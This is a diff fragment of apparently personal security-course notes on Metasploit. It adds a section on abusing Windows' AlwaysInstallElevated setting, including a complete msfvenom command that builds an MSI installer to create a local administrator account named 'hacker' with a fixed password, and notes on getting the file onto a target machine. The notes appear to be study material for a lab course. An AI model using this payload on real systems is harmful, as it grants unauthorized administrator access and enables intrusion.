knoepdan/CyberSecRappi/specialTopics/Important tools/Metasploit.md

 Success: attack succeded.
 Private key starts with "MIICW"  (see screenshot)

+### Create an msi which creates an local admin user (via )
+If AlwaysInstallElevated is true (1), installer runs as elevated and it can be used to create local admins via msfvenom (`msfvenom -h`) a payload generator that is bundled with Metasploit.

+`msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add hacker Hacker@Work && net localgroup administrators hacker /add"' -f msi > useradd.msi`
+    - will create a msi file "useradd.msi" that runs the following code: "net user /add hacker Hacker@Work && net localgroup administrators hacker /add"$
+        - new user "hacker" with password "Hacker@Work" which is local admin
+    - file will have to be copied to a windows machine (via any means: fileshare, web attachment, gosh, etc.)
+    - When we download an run msi on windows, we might have to click away warnings.

 ### Further examples
 - Postgres -> see solutions "Gaining Access/Metasploitable MV"